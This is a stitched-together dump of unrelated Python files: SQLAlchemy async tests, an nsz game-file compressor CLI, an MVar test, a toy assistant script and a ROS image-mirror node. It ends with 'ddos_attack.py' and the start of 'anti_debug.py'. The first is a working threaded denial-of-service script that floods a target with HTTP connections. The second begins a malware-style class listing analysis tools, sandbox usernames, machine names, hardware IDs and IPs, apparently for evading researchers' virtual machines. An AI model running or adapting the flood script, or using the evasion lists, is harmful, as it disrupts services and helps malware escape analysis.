select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
__requires__ = ("asyncio",)
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
with async_engine.sync_engine.connect() as sync_conn:
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, connection_no_trans):
sync_conn = connection_no_trans
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
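# Editor's note (hedged sketch): AsyncResultTest above exercises AsyncConnection.stream(),
# whose server-side-cursor result is consumed asynchronously (all(), async-for, partitions()).
# The coroutine below shows the basic pattern against an arbitrary engine and table object;
# the "engine" and "users" parameters are assumptions for illustration.
async def _example_stream_in_partitions(engine, users):
    from sqlalchemy import select

    async with engine.connect() as conn:
        result = await conn.stream(select(users))          # server-side cursor result
        async for partition in result.partitions(100):     # rows arrive in chunks of 100
            for row in partition:
                print(row)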
|
__init__.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from sys import path
from pathlib import Path
from sys import argv
from nsz.nut import Print
from os import listdir, _exit, remove
from time import sleep
from nsz.Fs import Nsp, Hfs0, factory
from nsz.BlockCompressor import blockCompress
from nsz.SolidCompressor import solidCompress
from traceback import print_exc, format_exc
from nsz.NszDecompressor import verify as NszVerify, decompress as NszDecompress, VerificationException
from multiprocessing import cpu_count, freeze_support, Process, Manager
from nsz.ThreadSafeCounter import Counter
from nsz.FileExistingChecks import CreateTargetDict, AllowedToWriteOutfile, delete_source_file
from nsz.ParseArguments import *
from nsz.PathTools import *
from nsz.ExtractTitlekeys import *
from nsz.undupe import undupe
import enlighten
import time
import sys
def solidCompressTask(in_queue, statusReport, readyForWork, pleaseNoPrint, pleaseKillYourself, id):
while True:
readyForWork.increment()
item = in_queue.get()
readyForWork.decrement()
if pleaseKillYourself.value() > 0:
break
try:
filePath, compressionLevel, outputDir, threadsToUse, verifyArg = item
outFile = solidCompress(filePath, compressionLevel, outputDir, threadsToUse, statusReport, id, pleaseNoPrint)
if verifyArg:
Print.info("[VERIFY NSZ] {0}".format(outFile))
try:
verify(outFile, True, [statusReport, id], pleaseNoPrint)
except VerificationException:
Print.error("[BAD VERIFY] {0}".format(outFile))
Print.error("[DELETE NSZ] {0}".format(outFile))
remove(outFile)
except KeyboardInterrupt:
Print.info('Keyboard exception')
except BaseException as e:
Print.info('nut exception: {0}'.format(str(e)))
raise
def compress(filePath, outputDir, args, work, amountOfTastkQueued):
compressionLevel = 18 if args.level is None else args.level
if (filePath.suffix == ".xci" and not args.solid) or args.block:
threadsToUseForBlockCompression = args.threads if args.threads > 0 else cpu_count()
outFile = blockCompress(filePath, compressionLevel, args.bs, outputDir, threadsToUseForBlockCompression)
if args.verify:
Print.info("[VERIFY NSZ] {0}".format(outFile))
verify(outFile, True)
else:
threadsToUseForSolidCompression = args.threads if args.threads > 0 else 3
work.put([filePath, compressionLevel, outputDir, threadsToUseForSolidCompression, args.verify])
amountOfTastkQueued.increment()
def decompress(filePath, outputDir, statusReportInfo = None):
NszDecompress(filePath, outputDir, statusReportInfo)
def verify(filePath, raiseVerificationException, statusReportInfo = None, pleaseNoPrint = None):
NszVerify(filePath, raiseVerificationException, statusReportInfo, pleaseNoPrint)
err = []
def main():
global err
try:
if len(argv) > 1:
args = ParseArguments.parse()
else:
try:
from nsz.gui.NSZ_GUI import GUI
except ImportError:
Print.error("Failed to import the GUI - is it installed?")
return
args = GUI().run()
if args == None:
Print.info("Done!")
return
if args.output:
argOutFolderToPharse = args.output
if not argOutFolderToPharse.endswith('/') and not argOutFolderToPharse.endswith('\\'):
argOutFolderToPharse += "/"
if not Path(argOutFolderToPharse).is_dir():
Print.error('Error: Output directory "{0}" does not exist!'.format(args.output))
return
argOutFolder = Path(argOutFolderToPharse).resolve() if args.output else None
Print.info('')
Print.info(' NSZ v4.0 ,;:;;,')
Print.info(' ;;;;;')
Print.info(' .=\', ;:;;:,')
Print.info(' /_\', "=. \';:;:;')
Print.info(' @=:__, \,;:;:\'')
Print.info(' _(\.= ;:;;\'')
Print.info(' `"_( _/="`')
Print.info(' `"\'')
Print.info('')
barManager = enlighten.get_manager()
poolManager = Manager()
statusReport = poolManager.list()
readyForWork = Counter(0)
pleaseNoPrint = Counter(0)
pleaseKillYourself = Counter(0)
pool = []
work = poolManager.Queue()
amountOfTastkQueued = Counter(0)
targetDictNsz = dict()
targetDictXcz = dict()
if args.titlekeys:
extractTitlekeys(args.file)
if args.extract:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
filePath_str = str(filePath)
outFolder = argOutFolder.joinpath(filePath.stem) if argOutFolder else filePath.parent.absolute().joinpath(filePath.stem)
Print.info('Extracting "{0}" to {1}'.format(filePath_str, outFolder))
container = factory(filePath)
container.open(filePath_str, 'rb')
if isXciXcz(filePath):
for hfs0 in container.hfs0:
secureIn = hfs0
secureIn.unpack(outFolder.joinpath(hfs0._path), args.extractregex)
else:
container.unpack(outFolder, args.extractregex)
container.close()
if args.undupe or args.undupe_dryrun:
undupe(args, argOutFolder)
if args.create:
Print.info('Creating "{0}"'.format(args.create))
nsp = Nsp.Nsp(None, None)
nsp.path = args.create
nsp.pack(args.file)
if args.C:
sourceFileToDelete = []
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
if not isUncompressedGame(filePath):
continue
try:
outFolder = argOutFolder if argOutFolder else filePath.parent.absolute()
if filePath.suffix == '.nsp':
if not outFolder in targetDictNsz:
targetDictNsz[outFolder] = CreateTargetDict(outFolder, args, ".nsz")
if not AllowedToWriteOutfile(filePath, ".nsz", targetDictNsz[outFolder], args):
continue
elif filePath.suffix == '.xci':
if not outFolder in targetDictXcz:
targetDictXcz[outFolder] = CreateTargetDict(outFolder, args, ".xcz")
if not AllowedToWriteOutfile(filePath, ".xcz", targetDictXcz[outFolder], args):
continue
compress(filePath, outFolder, args, work, amountOfTastkQueued)
if args.rm_source:
sourceFileToDelete.append(filePath)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while compressing file: %s' % filePath)
err.append({"filename":filePath,"error":format_exc() })
print_exc()
bars = []
compressedSubBars = []
BAR_FMT = u'{desc}{desc_pad}{percentage:3.0f}%|{bar}| {count:{len_total}d}/{total:d} {unit} [{elapsed}<{eta}, {rate:.2f}{unit_pad}{unit}/s]'
parallelTasks = min(args.multi, amountOfTastkQueued.value())
if parallelTasks < 0:
parallelTasks = 4
for i in range(parallelTasks):
statusReport.append([0, 0, 100, 'Compressing'])
p = Process(target=solidCompressTask, args=(work, statusReport, readyForWork, pleaseNoPrint, pleaseKillYourself, i))
p.start()
pool.append(p)
for i in range(parallelTasks):
bar = barManager.counter(total=100, desc='Compressing', unit='MiB', color='cyan', bar_format=BAR_FMT)
compressedSubBars.append(bar.add_subcounter('green'))
bars.append(bar)
# Ensures that all queued tasks are started and completed before the worker processes are asked to quit
while readyForWork.value() < parallelTasks:
sleep(0.2)
if pleaseNoPrint.value() > 0:
continue
pleaseNoPrint.increment()
for i in range(parallelTasks):
compressedRead, compressedWritten, total, currentStep = statusReport[i]
if bars[i].total != total:
bars[i].total = total//1048576
bars[i].count = compressedRead//1048576
compressedSubBars[i].count = compressedWritten//1048576
bars[i].desc = currentStep
bars[i].refresh()
pleaseNoPrint.decrement()
pleaseKillYourself.increment()
for i in range(readyForWork.value()):
work.put(None)
while readyForWork.value() > 0:
sleep(0.02)
for i in range(parallelTasks):
bars[i].close(clear=True)
barManager.stop()
for filePath in sourceFileToDelete:
delete_source_file(filePath)
if args.D:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
if not isCompressedGame(filePath) and not isCompressedGameFile(filePath):
continue
try:
outFolder = argOutFolder if argOutFolder else filePath.parent.absolute()
if filePath.suffix == '.nsz':
if not outFolder in targetDictNsz:
targetDictNsz[outFolder] = CreateTargetDict(outFolder, args, ".nsp")
if not AllowedToWriteOutfile(filePath, ".nsp", targetDictNsz[outFolder], args):
continue
elif filePath.suffix == '.xcz':
if not outFolder in targetDictXcz:
targetDictXcz[outFolder] = CreateTargetDict(outFolder, args, ".xcz")
if not AllowedToWriteOutfile(filePath, ".xci", targetDictXcz[outFolder], args):
continue
elif filePath.suffix == '.ncz':
outFile = Path(changeExtension(outFolder.joinpath(filePath.name), ".nca"))
if not args.overwrite and outFile.is_file():
Print.info('{0} with the same file name already exists in the output directory.\n'\
'If you want to overwrite it use the -w parameter!'.format(outFile.name))
continue
decompress(filePath, outFolder)
if args.rm_source:
delete_source_file(filePath)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while decompressing file: {0}'.format(filePath))
err.append({"filename":filePath, "error":format_exc()})
print_exc()
if args.info:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
filePath_str = str(filePath)
Print.info(filePath_str)
f = factory(filePath)
f.open(filePath_str, 'r+b')
f.printInfo(args.depth+1)
f.close()
if args.verify and not args.C and not args.D:
for f_str in args.file:
for filePath in expandFiles(Path(f_str)):
try:
if isGame(filePath):
Print.info("[VERIFY {0}] {1}".format(getExtensionName(filePath), filePath.name))
verify(filePath, True)
except KeyboardInterrupt:
raise
except BaseException as e:
Print.error('Error while verifying file: {0}'.format(filePath))
err.append({"filename":filePath,"error":format_exc()})
print_exc()
if len(argv) == 1:
pass
except KeyboardInterrupt:
Print.info('Keyboard exception')
except BaseException as e:
Print.info('nut exception: {0}'.format(str(e)))
raise
if err:
Print.info('\n\033[93m\033[1mSummary of errors which occurred while processing files:')
for e in err:
Print.info('\033[0mError while processing {0}'.format(e["filename"]))
Print.info(e["error"])
Print.info('\nDone!\n')
print()
print()
if len(argv) <= 1:
input("Press Enter to exit...")
sys.exit(1)
Print.info('\nDone!\n')
if len(argv) <= 1:
input("Press Enter to exit...")
sys.exit(0)
#breakpoint()
if __name__ == '__main__':
freeze_support()
main()
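# Editor's note (hedged sketch): the pipeline above coordinates worker processes through a
# Manager queue plus Counter objects (readyForWork / pleaseKillYourself) rather than sentinel
# values. The standalone sketch below shows the same producer/worker idea with a plain
# poison-pill protocol; the names and the "item * 2" stand-in for solidCompress() are
# illustrative assumptions, not nsz's actual API.
def _sketch_worker(in_queue, out_queue):
    while True:
        item = in_queue.get()
        if item is None:              # poison pill: the producer asks the worker to exit
            break
        out_queue.put(item * 2)       # stand-in for the real compression call

def _sketch_run_pool(items, workers=3):
    from multiprocessing import Process, Queue
    in_q, out_q = Queue(), Queue()
    procs = [Process(target=_sketch_worker, args=(in_q, out_q)) for _ in range(workers)]
    for p in procs:
        p.start()
    for item in items:
        in_q.put(item)
    for _ in procs:                   # one pill per worker, mirroring `work.put(None)` above
        in_q.put(None)
    for p in procs:
        p.join()
    return [out_q.get() for _ in items]   # order is not guaranteed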
|
test_mvar.py
|
# Copyright (c) 2018 Gabriele Baldoni.
#
# See the NOTICE file(s) distributed with this work for additional
# information regarding copyright ownership.
#
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# http://www.eclipse.org/legal/epl-2.0, or the Apache License, Version 2.0
# which is available at https://www.apache.org/licenses/LICENSE-2.0.
#
# SPDX-License-Identifier: Apache-2.0
#
# Contributors: Gabriele Baldoni MVar implementation in Python
import unittest
from mvar import MVar
from threading import Thread
from random import randint
import time
class MVarTests(unittest.TestCase):
def test_get_put(self):
def worker(var):
time.sleep(randint(1, 3))
var.put(1)
def worker2(var):
var.put(3)
local_var = MVar()
Thread(target=worker, args=(local_var,), daemon=True).start()
res = local_var.take()
local_var.put(2)
Thread(target=worker2, args=(local_var,), daemon=True).start()
res2 = local_var.take()
res3 = local_var.take()
self.assertEqual(res, 1)
self.assertEqual(res2, 2)
self.assertEqual(res3, 3)
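# Editor's note (hedged sketch): the test above relies on MVar.take() blocking until a value
# is present and MVar.put() blocking while the box is already full. The class below is a
# minimal illustration of those semantics built on threading.Condition; it is an assumption
# about the behaviour being tested, not the mvar package's actual implementation.
from threading import Condition

class _SketchMVar:
    def __init__(self):
        self._cond = Condition()
        self._full = False
        self._value = None

    def put(self, value):
        with self._cond:
            while self._full:             # block while the box already holds a value
                self._cond.wait()
            self._value, self._full = value, True
            self._cond.notify_all()

    def take(self):
        with self._cond:
            while not self._full:         # block until a value arrives
                self._cond.wait()
            value, self._value, self._full = self._value, None, False
            self._cond.notify_all()
            return value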
|
project.py
|
import datetime
import time
import wikipedia
import webbrowser
from multiprocessing import Process
class userinput():
def time(self):
hour = int(datetime.datetime.now().hour)
if hour >= 0 and hour < 12:
print("Good Morning Sir")
elif hour >= 12 and hour<18:
print("Good Afternoon Sir")
else:
print("Good Evening Sir")
def r_write(self, text, file_name):
reminder_file = open(file_name, "w")
reminder_file.write(text)
reminder_file.close()
print("\nYour file is written into", file_name)
def r_read(self, file_name):
reminder_file = open(file_name, "r")
reminder_content = reminder_file.read()
reminder_file.close()
reminder = reminder_content
return reminder
def r_append(self, extra, file_name):
reminder_file = open(file_name, "a")
file = reminder_file.write(extra)
reminder_file.close()
print("Append complete")
def reminder(self, file_name, remember, timer):
reminder = self.r_write(remember, file_name)
timer = timer * 60  # time.sleep() works in seconds, so convert the minutes to seconds
print("Reminder started")
time.sleep(timer)
print(self.r_read(file_name))
print("Reminder alert!...check reminder Sir")
def chat_main(self):
while True:
query_of_user = input("Please enter what you'd like me to do?")
query_of_user = query_of_user.lower()
if 'wikipedia' in query_of_user:
ask_user = input("Sir I have two options..would you like to search or open the website? Open/search")
if ask_user.lower() == "open wikipedia":
operator = webbrowser.get()
operator.open("https://en.wikipedia.org/wiki/Main_Page")
elif ask_user.lower() == "search":
results = input("What would you like to search?")
print("Searching Wikipedia...")
results = wikipedia.search(results)
query_of_user = query_of_user.replace("","")
print("According to Wikipedia")
print(results)
elif 'open youtube' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.youtube.com")
elif 'open google' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.google.com")
elif 'open stackoverflow' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.stackoverflow.com")
elif "the time" in query_of_user:
thetime = datetime.datetime.now()
print("Sir the time is currently...{}".format(thetime))
elif 'reminder' in query_of_user:
new_ask_user = input("Would you like to be reminded of something? Y/N")
if new_ask_user.lower() == "y":
file_name = input("What do you want to be reminded and the filename?")
remember = input("What would you like to be reminded about Sir?")
timer = float(input("In how many minutes should I remind you Sir?"))
remind_process = Process(target=self.reminder, args=(file_name, remember, timer))
remind_process.start()
print("Reminder process Started")
time.sleep(0.3)
ask_user = input("Would you like to Read/Write/Append the file Sir? Read/Write/Append")
if ask_user.lower() == "read":
file_name = str(input("What should the File name be?"))
remind = self.r_read(file_name)
print(remind)
elif ask_user.lower() == "append":
extra = str(input("What do you want to add?"))
file_name = str(input("What should the File name be?"))
self.r_append(extra, file_name)
elif ask_user.lower() == "write":
text = str(input("What do you want to be reminded of?"))
file_name = str(input("What should the File name be?"))
self.r_write(text,file_name)
else:
continue
elif 'notepad' in query_of_user:
notesobj = open("notepad.txt" , "w")
print("Please enter if you'd like to write in the file")
notesobj.write(input())
notesobj.close()
print("Success")
ask_user = input("Would you like to read/write to that file Sir? Read/append")
if ask_user.lower() == "read":
notesobj = open("notepad.txt", "r")
print(notesobj.read())
elif ask_user.lower() == "append":
notesobj = open("notepad.txt", "a")
notesobj = open("notepad.txt", "a")
print("please write what you'd like to say sir")
notesobj.write(input())
notesobj.close()
ask_user = input("Would you like to create another file sir? Y/N")
if ask_user.lower() == "y":
notesobj = open("notepad1.txt", "w")
print("What would you like to write sir?")
notesobj.write(input())
notesobj.close()
print("Success")
ask_user = input("Would like to read/append that file sir? Read/Append")
if ask_user.lower() == "read":
notesobj = open("notepad1.txt", "r")
elif ask_user.lower() == "append":
print("please write what you'd like to say sir")
notesobj = open("notepad1.txt", "a")
notesobj.write(input())
notesobj.close()
elif ask_user.lower() == "n":
continue
elif 'open spotify' in query_of_user:
operator = webbrowser.get()
operator.open("https://www.spotify.com/uk/")
elif 'exit' in query_of_user:
print("Sure no problem Sir, goodbye")
break
else:
print("Sorry please try again Sir.")
if __name__ == "__main__":
print("""
Please choose from the following options Sir:
-----Wikipedia
----Notepad
----reminders
----Spotify
----the time
----stackoverflow
----google
----youtube
----exit
"""
)
thread_one = userinput()
thread_one.chat_main()
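# Editor's note (hedged sketch): the reminder feature above writes the note to a file and
# then sleeps inside a separate multiprocessing.Process so the chat loop stays responsive.
# The helpers below isolate that pattern; the default message, delay and file name are
# illustrative assumptions only.
def _remind_once(message, minutes, file_name):
    with open(file_name, "w") as f:       # persist the note, as r_write() does
        f.write(message)
    time.sleep(minutes * 60)              # convert minutes to seconds before sleeping
    with open(file_name) as f:
        print("Reminder alert!...", f.read())

def _example_background_reminder(message="drink water", minutes=0.05, file_name="reminder_demo.txt"):
    p = Process(target=_remind_once, args=(message, minutes, file_name))
    p.start()                             # the chat loop can keep running while this sleeps
    return p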
|
testing.py
|
import os, sys
import argparse
MY_PATH = os.path.dirname(os.path.abspath(__file__))
if __name__ == '__main__':
# path = os.path.join(train.DEFAULT_DATA_PATH, 'emnist')
# torchvision.datasets.EMNIST(path, split='letters', download=True, train=True)
# mp.freeze_support()
# mp.set_start_method('spawn')
# a = torch.arange(3)#.cuda()
# p = mp.Process(target=t, args=(a,1,))
# p.start()
# p.join()
print(sys.argv)
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('test', type=str)
parser.add_argument('--test2', type=str)
args = parser.parse_known_args()
print(args)
# train.register_config('mnist', os.path.join(MY_PATH, 'mnist', 'config', 'base.toml'))
#
# print(train.config._config_registry)
# C = train.get_config('mnist')
# print(C.keys())
|
virtual_mirror_tristan_node.py
|
#!/usr/bin/env python
import rospy
import cv2
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage, Image
from duckietown_msgs_tristan.msg import FlipDirection
import numpy as np
import threading
class VirtualMirrorNode(object):
def __init__(self):
self.node_name = "Virtual Mirror"
self.flip_direction = self.setupParam("~flip_direction","vert")
self.param_timer = rospy.Timer(rospy.Duration.from_sec(1.0),self.cbParamTimer)
# Thread lock
self.thread_lock = threading.Lock()
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~mirror_image", Image, queue_size=1)
self.pub_flip_direction = rospy.Publisher("~flip_direction", FlipDirection, queue_size=1)
# Verbose option
#self.verbose = rospy.get_param('~verbose')
self.verbose = False
#if self.verbose:
# self.toc_pre = rospy.get_time()
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
rospy.loginfo("[%s] Initialized." %(self.node_name))
def cbParamTimer(self,event):
self.flip_direction = rospy.get_param("~flip_direction", "vert")
flip_out = FlipDirection()
flip_out.flip_direction = self.flip_direction
self.pub_flip_direction.publish(flip_out)
def setupParam(self,param_name,default_value):
value = rospy.get_param(param_name,default_value)
rospy.set_param(param_name,value) # Write to parameter server for transparency
rospy.loginfo("[%s] %s = %s " %(self.node_name,param_name,value))
return value
def cbImage(self,image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start()
# Returns right away; the daemon thread does the work
def processImage(self,image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency received = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Decode from compressed image
# with OpenCV
image_cv = cv2.imdecode(np.fromstring(image_msg.data, np.uint8), cv2.CV_LOAD_IMAGE_COLOR)
# Verbose
if self.verbose:
self.tic = rospy.get_time()
rospy.loginfo("[%s] Latency image decompressed = %.3f ms" %(self.node_name, (self.tic-image_msg.header.stamp.to_sec()) * 1000.0))
# Process image here
if self.flip_direction == "horz":
mirrorImage = image_cv[:,::-1,:]
else:
mirrorImage = image_cv[::-1,:,:]
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(mirrorImage, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
# Verbose
if self.verbose:
rospy.loginfo("[%s] Latency sent = %.3f ms" %(self.node_name, (rospy.get_time()-image_msg.header.stamp.to_sec()) * 1000.0))
# Release the thread lock
self.thread_lock.release()
def onShutdown(self):
rospy.loginfo("[VirtualMirrorNode] Shutdown.")
if __name__ == '__main__':
rospy.init_node('virtual_mirror_tristan_node',anonymous=False)
virtual_mirror_node = VirtualMirrorNode()
rospy.on_shutdown(virtual_mirror_node.onShutdown)
rospy.spin()
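# Editor's note (hedged sketch): processImage() above mirrors the frame with negative-step
# numpy slicing. The helper below shows the same technique on a bare HxWx3 ndarray, without
# ROS or cv_bridge; the "vert"/"horz" strings follow this node's ~flip_direction parameter.
def _example_mirror(image, flip_direction="vert"):
    if flip_direction == "horz":
        return image[:, ::-1, :]   # reverse the column axis -> horizontal mirror
    return image[::-1, :, :]       # reverse the row axis -> vertical flip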
|
ddos_attack.py
|
"""
ddos_attack.py
- This script is used to demo a distributed denial of service attack
- Pytest along with several other copies of this script can be used to achieve a larger load
> pytest -n 10 # 10 being the number of scripts/workers
"""
import socket
import threading
# IP address of the target
target = "192.168.1.1"
print(f"Target: {target}")
# port for python to use
port = 80
print(f"Port: {port}")
# mask ip of python
mask_ip = "10.10.10.2"
print(f"Mask: {mask_ip}")
# connected counter
connected = 0
def ddos():
# loop indefinitely
while True:
# init server
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect server
serv.connect((target, port))
# send request
serv.sendto(
("GET /" + target + " HTTP/1.1\r\n").encode("ascii"), (target, port)
)
serv.sendto(("Host: " + mask_ip + "\r\n\r\n").encode("ascii"), (target, port))
# close server
serv.close()
# use global
global connected
# increment counter
connected += 1
# log request
print(f"DDOS Attempt: #{connected} -->> Target: {target}:{port}")
# run 500 times
for i in range(500):
# start thread on ddos()
thread = threading.Thread(target=ddos)
thread.start()
|
anti_debug.py
|
import os
import sys
import time
import httpx
import winreg
import psutil
import threading
import subprocess
class AntiDebug:
inVM = False
def __init__(self):
self.running = True
self.processes = list()
self.blackListedPrograms = ["httpdebuggerui.exe","wireshark.exe","fiddler.exe","regedit.exe","cmd.exe","taskmgr.exe","vboxservice.exe","df5serv.exe","processhacker.exe","vboxtray.exe","vmtoolsd.exe","vmwaretray.exe","ida64.exe","ollydbg.exe","pestudio.exe","vmwareuser","vgauthservice.exe","vmacthlp.exe","x96dbg.exe","vmsrvc.exe","x32dbg.exe","vmusrvc.exe","prl_cc.exe","prl_tools.exe","xenservice.exe","qemu-ga.exe","joeboxcontrol.exe","ksdumperclient.exe","ksdumper.exe","joeboxserver.exe"]
self.blackListedUsers = ["WDAGUtilityAccount","Abby","Peter Wilson","hmarc","patex","JOHN-PC","RDhJ0CNFevzX","kEecfMwgj","Frank","8Nl0ColNQ5bq","Lisa","John","george","PxmdUOpVyx","8VizSM","w0fjuOVmCcP5A","lmVwjj9b","PqONjHVwexsS","3u2v9m8","Julia","HEUeRzl",]
self.blackListedPCNames = ["BEE7370C-8C0C-4","DESKTOP-NAKFFMT","WIN-5E07COS9ALR","B30F0242-1C6A-4","DESKTOP-VRSQLAG","Q9IATRKPRH","XC64ZB","DESKTOP-D019GDM","DESKTOP-WI8CLET","SERVER1","LISA-PC","JOHN-PC","DESKTOP-B0T93D6","DESKTOP-1PYKP29","DESKTOP-1Y2433R","WILEYPC","WORK","6C4E733F-C2D9-4","RALPHS-PC","DESKTOP-WG3MYJS","DESKTOP-7XC6GEZ","DESKTOP-5OV9S0O","QarZhrdBpj","ORELEEPC","ARCHIBALDPC","JULIA-PC","d1bnJkfVlH",]
self.blackListedHWIDS = ["7AB5C494-39F5-4941-9163-47F54D6D5016","032E02B4-0499-05C3-0806-3C0700080009","03DE0294-0480-05DE-1A06-350700080009","11111111-2222-3333-4444-555555555555","6F3CA5EC-BEC9-4A4D-8274-11168F640058","ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548","4C4C4544-0050-3710-8058-CAC04F59344A","00000000-0000-0000-0000-AC1F6BD04972","00000000-0000-0000-0000-000000000000","5BD24D56-789F-8468-7CDC-CAA7222CC121","49434D53-0200-9065-2500-65902500E439","49434D53-0200-9036-2500-36902500F022","777D84B3-88D1-451C-93E4-D235177420A7","49434D53-0200-9036-2500-369025000C65","B1112042-52E8-E25B-3655-6A4F54155DBF","00000000-0000-0000-0000-AC1F6BD048FE","EB16924B-FB6D-4FA1-8666-17B91F62FB37","A15A930C-8251-9645-AF63-E45AD728C20C","67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3","C7D23342-A5D4-68A1-59AC-CF40F735B363","63203342-0EB0-AA1A-4DF5-3FB37DBB0670","44B94D56-65AB-DC02-86A0-98143A7423BF","6608003F-ECE4-494E-B07E-1C4615D1D93C","D9142042-8F51-5EFF-D5F8-EE9AE3D1602A","49434D53-0200-9036-2500-369025003AF0","8B4E8278-525C-7343-B825-280AEBCD3BCB","4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27","79AF5279-16CF-4094-9758-F88A616D81B4",]
self.blackListedIPS = ["88.132.231.71","78.139.8.50","20.99.160.173","88.153.199.169","84.147.62.12","194.154.78.160","92.211.109.160","195.74.76.222","188.105.91.116","34.105.183.68","92.211.55.199","79.104.209.33","95.25.204.90","34.145.89.174","109.74.154.90","109.145.173.169","34.141.146.114","212.119.227.151","195.239.51.59","192.40.57.234","64.124.12.162","34.142.74.220","188.105.91.173","109.74.154.91","34.105.72.241","109.74.154.92","213.33.142.50",]
#
